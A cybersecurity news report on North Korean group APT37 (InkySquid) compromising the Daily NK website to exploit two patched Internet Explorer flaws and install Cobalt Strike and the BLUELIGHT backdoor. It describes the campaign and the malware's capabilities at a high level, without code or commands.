NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware

Cyber Security

A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.

Cybersecurity firm Volexity attributed the watering hole attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.

The “clever disguise of exploit code amongst legitimate code” and the use of custom malware enables the attackers to avoid detection, Volexity researchers said.

The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021. Successful exploitation resulted in the deployment of a Cobalt Strike stager and novel backdoor called BLUELIGHT.

  • CVE-2020-1380 (CVSS score: 7.5) – Scripting Engine Memory Corruption Vulnerability
  • CVE-2021-26411 (CVSS score: 8.8) – Internet Explorer Memory Corruption Vulnerability

It’s worth noting that both the flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.

In a separate set of attacks disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.

BLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.

In addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.

“While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,” the researchers noted. “The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.”